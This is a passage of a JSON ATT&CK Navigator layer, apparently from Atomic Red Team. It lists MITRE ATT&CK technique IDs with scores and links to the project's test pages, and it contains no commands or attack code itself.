Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View 
